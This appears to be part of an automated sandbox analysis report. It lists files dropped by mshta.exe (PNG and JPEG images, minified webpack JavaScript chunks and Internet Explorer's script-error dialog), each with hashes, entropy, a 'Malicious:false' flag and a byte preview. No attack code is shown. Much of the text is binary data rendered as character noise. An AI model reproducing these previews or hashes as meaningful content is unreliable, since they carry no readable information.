                                                                                                                                                                                                                            File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):9930
                                                                                                                                                                                                                            Entropy (8bit):7.954853301155207
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:RSn+geYVEWjFbk4yc0eL1PJ7MvOWiHaMmRlOixz97tXdibW9x9:4nfeYrBL1PJRWiHjKlOixB7tYbq9
                                                                                                                                                                                                                            MD5:62CF989CFD81560CB2E86C7465C6B8C9
                                                                                                                                                                                                                            SHA1:241330EE4EF4939815FA3673AC61746AC7B74FE2
                                                                                                                                                                                                                            SHA-256:DB9E5060D4F39A3615820B2368032F89652E79930B8E73D178E890BD42A655B6
                                                                                                                                                                                                                            SHA-512:C2357BBAF553AED3C1B9CD6CFFEF41A1E95B03583B888ACAF557C7F02F3014C9412B69ECAE137B982246BCCE5FDFD9BC3FD529B6B698BABD46A0DAE110771371
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR...............).....pHYs............... .IDATx..olSW....!..$........v.b.<.."p..y......a.'..C.....v.zf.......I_....HM.E..t...BLU4.. Ft...1....8..6!.......}.}..k.>.jc.{....=......@..A..A..A..A..A..A..A..A..A...+u.r....!.b...5........D....X...8...,. ...C..\6.N.?..- .............0...Q...r.~Y..'......A.&*.0.....r.}...r,.......R.. ....0......E...x.........&.0_)._T.....^...../...98..!:A..o.W....H0.....<Z.3..I.....A.~.-..i=.Op9..q.N.. .........Z.......B+....y...qs.....8x.dp#..4.8f.P....Z....yO..R./..CF..0.....X.......pH..a.F...9.<Z......8..... ./.e..++A.&..O.......w..B2'.B3\@.g.By...%.3..h.. .....xK>N5y....o$r.(".hd..q.tkO....r.....0........!...L..0.....j.@W......QZ....k..Oh...Q&0...0....h.... ..Z.e.Er%..SoN.e.c...^]S.N.9A.-.z..=:...Q.8. xr%.)t...R.. ....\.....\....D...0.Op....*....L#..1...%.*t.......a.\<.0#.....;...A....G..{F.G!d.. .rDpg.&..,. ...1...2G.dm'....2jVU..9.. ....GB..T.........a.1..].a;AX...7.}.A.PML.Dy....U...h~N...g
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):289529
                                                                                                                                                                                                                            Entropy (8bit):7.9932652654098675
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:KW+2YoKwvVf5652mJUrKbSGoXtSLkqbc4ijrmo:t+5Gto5R22bSGIlr9
                                                                                                                                                                                                                            MD5:87BDE4CC492DCCB0F7D07560224F43D0
                                                                                                                                                                                                                            SHA1:0F1B2372C7F2D6D1E6F952108805007E7CE894D4
                                                                                                                                                                                                                            SHA-256:D8E3F0F1EB9B5E5CF6AF84B9794BB1603ED4EA10F89F3A85CCEAA07581AFF5F5
                                                                                                                                                                                                                            SHA-512:B77F1065FD81DBCD1DE91CD67C4294599F7A4F2FD52F7F26AAF71659B597B5010E87B9E6F3016E6D4FF9321CC6B6A665405706D72651F333850EF6C5DB967EB7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx.....y........0.m.P$...h..mY....s.C..p.p./.....C.....VX.M.h#.J.II... D.$@...`.^k.<......=..,.'....*+;..}_."K.@.....F...it....$..Z...=....W~..o>':.....:.V....&..........|..Q...>.......q......s.m.............p|..A..'z.'.[.{....h.....L0D....=.q....9.R...4nCy......g.=|.A.......k...N;....-..z.......vg:..N...u>...^......s..n.n..=..).I...$.n.E...<tz....T.D..v)..9tO2v.n...]...`.F~...'.7L.....p..B......8.=....^...d,L.7|..p.L0....e]...B.:...|.>...F]...|a..}.......i.nu.v.8L.....t."....t[^?.?h..#m.F.'..q.....f}?.p.....M.M"u........O......Z .Z..Ph.v.aR......Et\jL0....#.zd...1.e..&.....o..4...:..u.(...\3.=.~..n..n..}.....z.n......^.k?....g.>..bmO....,...F..^.v'EmEs..%?;...$6.....0...$....7....|?Z..'.`7......&8j....T...Gy.y.ip78...hx.......Ok..R....G%...v?..g4....R.u_~wW..|...$.n...~.6(#.|mooO.I..C.K?..A...^..d3.%.............}av..~.0....|X...t.Fx.......]..&....Ft..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):10836
                                                                                                                                                                                                                            Entropy (8bit):7.941641697152749
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:RSH0mmAUpiIIBfhWBIY5JD9IxWPis80Rkg177fKZ4Sp8iDbSflzz:4v89SEmY70Cis8Ykg177fKZ488Rflf
                                                                                                                                                                                                                            MD5:35C5E3637BC80D5B2F849895E2902760
                                                                                                                                                                                                                            SHA1:565B695B238CFAE8C775C2A7F120E26EC4F7C04A
                                                                                                                                                                                                                            SHA-256:4DDD7144A88F4658A3C49D7D50FBB4D2DF755672AED3109AAC01243329213E30
                                                                                                                                                                                                                            SHA-512:03FC90B01A07FC9259BB8B657BB16949864E544B66EC7ABBF7AF779E573223480E668E947A4E783A1A54EEA3E19D4B960CA7D0BF9F049BFBFD5D0652CC7C0A26
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR...............).....pHYs............... .IDATx...w..U........I.$'...D...9+..E..5cv.,k\.*F....]..."(..(Q.1.$OwW....`z...:M.L.>......8OW......!D.f..B...Q.$.B......@..D....Q.$.B...... T....'...BdP.='...A.3&...............@q.*'.F....+...`Y..7._..+7.K,...^...~.^H.E....K...Xn.......T`..7..U...9.uo...N)...U.b.9....W....z...p.0..j.Du......@.2.-..\....g.....DB../.s!{..o.,..T........y..E...=...b.,TZ.*.......@.J*S.|..'._.d#...00..3J.,.%DU..'....J.d3.m.O....xB..p%.)Nf."[A?....3K........q.L.].......>...]}`.N.2.$*.A7......eB....,..:a..^........Q.N..TF..g".&..pL..%.....l.}eO7......t+".pu,N...8.n.o..."..S.;.9A:A?..&.......\JR.z..I.u]..p2.%..S.z...vuR)P...:8.....V.G...!....m,)....pY...!2.R....L....2.[G....'...L.GRIcg......d A..,...S3!DF..:.[.oHu.s....o..L..P.......B.+.0.%H....].!D6.Q_A.~a.u.BdQ.&.z.d:(!..$..(..3W.!D..f./..8>.u.Bd....2..z..%.....5..k._...|]..Yt........!..3.^A7....."K..1..+..UG....x.@...^...".\..{.=.y...9...E....bE......E....^=..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):79022
                                                                                                                                                                                                                            Entropy (8bit):7.994287004427942
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:1536:vL7YP4W2zJhcThrk3fRCojq2QvNCQJEAOorvRxge0XxvqxKXw0ECa7vppSja:vLUPkUdkZBq2fQJX1j0hyxKATFHp
                                                                                                                                                                                                                            MD5:3B915F03734EAC9822524A22212667CF
                                                                                                                                                                                                                            SHA1:52E483EAF36CFFA7A1254ACF4419B48D4E87FE0C
                                                                                                                                                                                                                            SHA-256:4F5DCC5DD18D224B51D9D0D66BDD2915C1F11D6B4117CA796027BB47F0542335
                                                                                                                                                                                                                            SHA-512:58816CBE7AC706DEC9D08955C1C24AF5D68D8C7DDD50DD75E43E282B062AD4ABF92A5032928839177F44C1D83B4FDB9220835B06683849E023875E4E30766CD2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx...w.]W}'...s.m.U..l..j..,Y..Ms70...0. .$..H..7..y.f&of.>.!.&.......L.!.1%..-w[..e.z.....{.._[..A.l.......[k...2......\.G...r... .q..k0.v...>..(z.Wr..955...A....H..vs~...8......D....O...;..?.J....5.......:T|....b0.......L...cdd.C##....s+.k...g.rO?-(.Ni..q.MI.p....D.).f.Q........IdUG..T..m.....'.".. .....Q.\..`........#...x.......-._.2...bQv...U..-.L.0.x.L........G."CA....C.\...E..D@Uu..8)d|U7N.$......`.*.9.o... P..9....X`....t.....R.5..a.RV.......B5.A.....HY....~..El.>Q.j.(.....D.B..pT0J....`6JrR.O.Q.(I..2..-.....*S"0.@1..1.!.4V.PAk{>....px.8.....@]U.....5..U...d...Gx.8."..B.r.j....b...S)...D.].."...z..<.....2_...J.v..A1pvw.Z.o....`r[F.m<N.f..sbpm....It.0..:.0..0....B.>/-p..E..h..C.'0..+...tK.s...1TyUP..)..(..._.C..U..^,._W=.[..k.AJCC....D ..@.n..J<...(...(:..........H6J).A.......8Z...-X..j*.^E:.Q-tI......b.J. &1=>U....l...4..9Z9.=.J.(..-.@T.Az..GlV.@._jU`6.Q<......A...A....R.p.F.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):66188
                                                                                                                                                                                                                            Entropy (8bit):7.9879339747373095
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:WOTPfKbeCbS5aZHctZc3VtiioKR/PxGVeC0jsgKLuk4tgqGlUvHcE:WOTXKb+5aZ8jcfz1PxGQjs1uk4tFh
                                                                                                                                                                                                                            MD5:30D5F85029436F20563AAA8CD7BA8D9A
                                                                                                                                                                                                                            SHA1:56C3A1929E719F986449B5A2415B01A161163BF8
                                                                                                                                                                                                                            SHA-256:AAE5FF63FB8C856697BE9CF8FB615D6CA594A90E8ACBA09B1EF7F7EEA82BBFB8
                                                                                                                                                                                                                            SHA-512:7B9EDB6A0217D4C207FE814ACA031F34EC9500A1D8D28F2F3A95CFB5E3EF0CCD8B2DBE178B331DDD9126EA45DF56D6A0A8B4476A8D373AEB2EE4FA4288875C2E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..{.%W}..9......R.$..A...01.1..0..&v...0.L ....v....W......`.........'....... [...P#..ZRw...Uu.....?~y...nuW..n..vtTU.'..<.s~...{~W..........w.&......&8.11...kL.`..........&8.11...kL.`..........&8.11...kX.w.>.......<....h......&x~....<.....&x~...h....nL0...4.{..1....j7a.&8.11...kL.`..........&8.11...kL.`..........&8.11...kL.`..........&8.11...kL.`..........&8.11...kL.`.....8...G.........w..i..s....1Y.&8.qr+.......}a...*...gx./.E[..G.o.._.t.=..~.v=5.Z7\...v.....+.......{w.5_y......c'../}...e.]...~..J.....5......z..z....O....~.L.<.....=.1qr+.{.........z..w...'.[........9..r...k_-.V..WJ....2....\...7....Y.-,...tr...?......N9...........+/?..;?.7.G^..>..w/3.q8...#..5..oX.....3..l................M..'v.`....y..m-...?'..p...-....z<v7...#g...#......o.....o.Y..o.*..G^...F..V.l.?/..?+...;.r'../.o..m.$.._.o....m.c......=r0.~Z~..'............|m.....o.9......L?G.....~ 38...ow.y..n..`.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):148863
                                                                                                                                                                                                                            Entropy (8bit):5.505254113901523
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:O/+63VZkqUOuZOf9VZgF4GZyFg3VnfS1fxDibXE6k3XHoH/WTT6u2:OW63V+xOuqV3HgQ1p+M3XHPN2
                                                                                                                                                                                                                            MD5:D31F05B0617CF851CAEC52A9F66BFEA7
                                                                                                                                                                                                                            SHA1:E54BB363EB0E93D6F85A9DAB42A502E8DA0AA3EA
                                                                                                                                                                                                                            SHA-256:455449EE12DDBAB0D9690306ECED77A72CC560B8AF0649AB3EBE84E801E8FD71
                                                                                                                                                                                                                            SHA-512:7D490199EE73C6ECED0F655314F207AD907ED1FD89F9126819540765D7B288224FF4D71B08E340CE418BDA7DADE7480E2CE752A0CD1345712F932DE0DB5FB1CC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[6965,4446,9458,7736,7662,8773,5369],{26311:(e,n,t)=>{"use strict";t.d(n,{Z:()=>r});var i,o=t(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i])}return e}).apply(this,arguments)}const r=function(e){return o.createElement("svg",a({viewBox:"0 0 18 11","aria-labelledby":"arrowIcon arrowDesc"},e),i||(i=o.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},96767:(e,n,t)=>{"use strict";t.d(n,{Z:()=>r});var i,o=t(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i])}return e}).apply(this,arguments)}const r=function(e){return o.createElement("svg",a({viewBox:"0 0 24 32","aria-labelledby":"
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (26993)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):27084
                                                                                                                                                                                                                            Entropy (8bit):5.460556309656924
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:6o0CyUivaKO05O8uDYHed29jM9DHxr4q10rjM9DpM2kUbnGlklwUvMzc5QUD/89Y:6ofyUWOf75WaJDKxPUbGlklwU/foQD
                                                                                                                                                                                                                            MD5:158545F000AC65FBD2C2053B395663CD
                                                                                                                                                                                                                            SHA1:2E921FF9C0C2F7C364E588116EECBE6F58DBB0A9
                                                                                                                                                                                                                            SHA-256:23E81F7D4D1A0187DE6E96ECA45C9A1F9AF4DCD77B417385B772E967D268BB8D
                                                                                                                                                                                                                            SHA-512:FDC29C7F3816DA27BD25F78B5C10A9319FF617A1D9481B25B202C9FC9FFA785E114AC113863169E94228E35EE440EA08068E4B0212F8783A3E8A57B6AE868CEA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[9345],{45534:(e,t,n)=>{n.d(t,{Z:()=>a});var o,r=n(32735);function i(){return(i=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const a=function(e){return r.createElement("svg",i({viewBox:"0 0 24 24","aria-labelledby":"closeIcon closeDesc"},e),o||(o=r.createElement("path",{d:"M6.06 5L12 10.94 17.94 5A.75.75 0 0119 6.06L13.06 12 19 17.94A.75.75 0 0117.94 19L12 13.06 6.06 19A.75.75 0 015 17.94L10.94 12 5 6.06A.75.75 0 116.06 5z",fill:"inherit"})))}},21105:(e,t)=>{var n=Object.prototype.hasOwnProperty;function o(e){try{return decodeURIComponent(e.replace(/\+/g," "))}catch(t){return null}}function r(e){try{return encodeURIComponent(e)}catch(t){return null}}t.stringify=function(e,t){t=t||"";var o,i,a=[];for(i in"string"!==typeof t&&(t="?"),e)if(n.ca
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8228)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8321
                                                                                                                                                                                                                            Entropy (8bit):5.294678907318697
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:3bIpMVRrGnY+qdpZHmJECQdR2VCy2QDR2CCzg:9rGnypZHpdR2VCy1DR2CCzg
                                                                                                                                                                                                                            MD5:98127D478753B944FDDE1270176F2917
                                                                                                                                                                                                                            SHA1:0FAA7BBCD58224B16AF02D8B6AC491205B1C3DAC
                                                                                                                                                                                                                            SHA-256:E69F7E4B00FBFE16B1929A0FD6608313425D73EDD934583132DBF3CB8C9A578E
                                                                                                                                                                                                                            SHA-512:AF816A8F0586CA1663B5E8E624415E2F4A7BA2CD0587AFBB32E55D8042619F01614F98DB3B7064394F8C3A60116C6580EE977D13F7B7E08D48B28718B36B472B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5901],{40848:(e,t,o)=>{o.d(t,{Q:()=>A});var n,r=o(20011),i=o(8821),a=o(85169),d=o(93173),l=o(82248),s=o(46647),c=o(32735),u=o(12788),g=/^-?\d*\.?\d+(px|%)$/;function p(e,t){return Array.isArray(e)&&Array.isArray(t)&&e.length===t.length?e.some((function(o,n){return p(e[n],t[n])})):e!==t}var f=(n=Object.prototype).hasOwnProperty,v=n.toString;function h(e){return e&&f.call(e,"ref")}var w=new Map;function b(e){void 0===e&&(e={});for(var t,o=e.root||null,n=function(e){var t=(e?e.trim():"0px").split(/\s+/).map((function(e){if(!g.test(e))throw new Error("rootMargin must be a string literal containing pixels and/or percent values");return e})),o=t.shift(),n=t[0],r=void 0===n?o:n,i=t[1],a=void 0===i?o:i,d=t[2];return o+" "+r+" "+a+" "+(void 0===d?r:d)}(e.rootMargin),r=Array.isArray(e.threshold)?e.threshold:[null!=e.threshold?e.threshold:0],i=w.keys();t=i.next().value;){if(!(o!==t.root||n!==t.rootMargin||p(
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (61477)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):61571
                                                                                                                                                                                                                            Entropy (8bit):5.474088357195367
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:t8MlbIwODYayNH04yljeRM9R0E4axoIyeBHv:pci5042eRM9Rj4zIyex
                                                                                                                                                                                                                            MD5:C0DBAFACF4834B8EA409FDED93630EF9
                                                                                                                                                                                                                            SHA1:52593A3D1EB438C99DF046C177D6626806E1753D
                                                                                                                                                                                                                            SHA-256:153F19A31821F63A8CBAC764E1293F687C20B3E2BCDE30A05CBC2CDB52971D36
                                                                                                                                                                                                                            SHA-512:536C645F9C8A31BE2668DC5BA9A0143BBF73F05B14780AA2F6E10192C74D4DFF47F17C8F3C07963FB405D5C4022FD123F60EFB6597DB8FEF28A1213F107E99AE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[8600,9359],{74796:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var i,r,a,o=n(32735);function s(){return(s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const c=function(e){return o.createElement("svg",s({viewBox:"0 0 315 314","aria-labelledby":"ameSymbolIcon ameSymbolDesc"},e),i||(i=o.createElement("circle",{fill:"inherit",cx:157.5,cy:157.5,r:156.5})),r||(r=o.createElement("path",{d:"M146.767 117.423c7.623 7.619 19.988 7.619 27.611 0l32.725-32.71c3.624-3.624 8.32-5.503 13.07-5.68V79h-119.2v.032c4.751.177 9.45 2.057 13.08 5.681l32.714 32.71z",fill:"#FFF",opacity:.6})),a||(a=o.createElement("path",{d:"M267.428 117.412l-32.713-32.7c-4-3.997-9.302-5.876-14.542-5.68-4.749.179-9.447 2.058-13.07 5.68l-32.724 32.71c-7.623 7.62-19.989 7.62-27.613 0l-32.713-32.71c-3.63
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):342616
                                                                                                                                                                                                                            Entropy (8bit):7.997289238267219
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:aV/b/zbZARUgDFTBSFSKHSohzjSa2XNzoHD6UOB9xS1m4AyaKn2QEyUYGT/ZB:aVTLbZWUgDFN0hHSa2XN4eUOTxS1j6KY
                                                                                                                                                                                                                            MD5:09A9359538C4023FA1AA96FE9ADD37CF
                                                                                                                                                                                                                            SHA1:140F70F523A32250E739B9911A6C0521D0B70E88
                                                                                                                                                                                                                            SHA-256:6CC5E70BA885C9E30D21E0FA642917E8D69B4C8E2DDD65D477AC9E0033F6859B
                                                                                                                                                                                                                            SHA-512:52C35173E3C10E79FC48314D894372E658AC04884721A219ACE472F00F464EC71C8FD0AFD336AEB9F1EE84F57487E56BE8707BCCA0EDDDD30EE7EDADA547B056
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx...-Ir....:.t..}.....|.D.,....0l..?.?.?.!.....Y.!..lB".drIq.....>.ow.GUf.C.#2+.N..}.,..@..GfdddfDdTd$....!.."..=..`..`.d.1.j.0..,....@.@..J..'bU..?....s.5..$.'..g....j..}Y...,...M...=64.7]SC@.4+.5."...n.p[......1`..Y.x...}..U.C...`q.A...r..........H[......cy..`'..g..fy.....C... ...X..X."4KB{.`.N.wm.{..]2.cP._.H_....NZ.._k.-..a.G.z.|.5.Y....c....;.m.5..cE...1.{S.7R>&...M.X<4@..+....@......N...L.j..8..M.4_o..Xp...87.r......x$fq..9.Mdv."..8...9.........V2...8.3c@.>...91~...V.zy....2.......7R.....!..ja...........;...|..;.:......9.-.[.6.hE.}.l..s..U.1..`.<.L.;._Jy5.t&.`I......p.p.w......].[._p.n<E.l.p<^G...z.?~..Q......F.=...i6..... .."A.V........t.,...O.....4(L..1.....(.ME..l...j...yM......x...6.....}=.m..$.!y.C.8........... .X..rP.J'vj..H..1B...a_p.....JXu......b...9.*.G.........<.p.....y"..o.......T..8V..8..ox..h....s...a....2.Sz......V......w.^...&]F./.....JY..q....<...G?.#.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3249
                                                                                                                                                                                                                            Entropy (8bit):5.4598794938059125
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                                                                                                                                                                                            MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                                                                                                                                                                                            SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                                                                                                                                                                                            SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                                                                                                                                                                                            SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1706
                                                                                                                                                                                                                            Entropy (8bit):5.274543201400288
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                                                                                            MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                                                                                            SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                                                                                            SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                                                                                            SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):285
                                                                                                                                                                                                                            Entropy (8bit):3.0648219798227685
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:nStlVlPq4VVO1VMaRq8V8BGaTu0MjDtq+EtUhhk//A/l9ms8:cAVMgVPEudjDtqRUhh/l9ms8
                                                                                                                                                                                                                            MD5:2E85899818427B96F57DB55DD05D06A7
                                                                                                                                                                                                                            SHA1:97DD1C541DF27AB842557955390AD1D48A204706
                                                                                                                                                                                                                            SHA-256:3B8BFA505FC51242D5B2452E3BCE6C89DA12923FB0AD61F00EE72100C9CB3CD0
                                                                                                                                                                                                                            SHA-512:3C57FDCE71D42124BA28ADBDCCFE87BE7DCE26950BE32935ECF4A4AA54E5AFA9AFD46F1EA66E5EABC56956465E65377E4976EDD563FDFCA9CE14AB551A5CC0E4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......JFIF.............C.rOVdVGrd]d.yr......................................................C.y.........................................................................."............................................................................................................?......
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):224845
                                                                                                                                                                                                                            Entropy (8bit):7.994739990069494
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:amrlaGF4bFMzu5ID2kO2gCmZ3Am73ouj/1C:a2lRF4Szu5IDHc3Am73oGdC
                                                                                                                                                                                                                            MD5:9478D604A860A7733917DC1539CDE3C5
                                                                                                                                                                                                                            SHA1:E79769846947C43439A80E490C6861E9AC73CC19
                                                                                                                                                                                                                            SHA-256:B904296E622551B280A830DF6F29909EA7A86621E23C711A9CD0FC23F9A75B83
                                                                                                                                                                                                                            SHA-512:4334A97DE3A736EB542F78C1C3C9A1C2F9FD30B41D6806CC836C0E547A8404876E676492DD80411B278A90A1CA0A3B6476451E8979AE52A271D688753F775675
                                                                                                                                                                                                                            Malicious:false
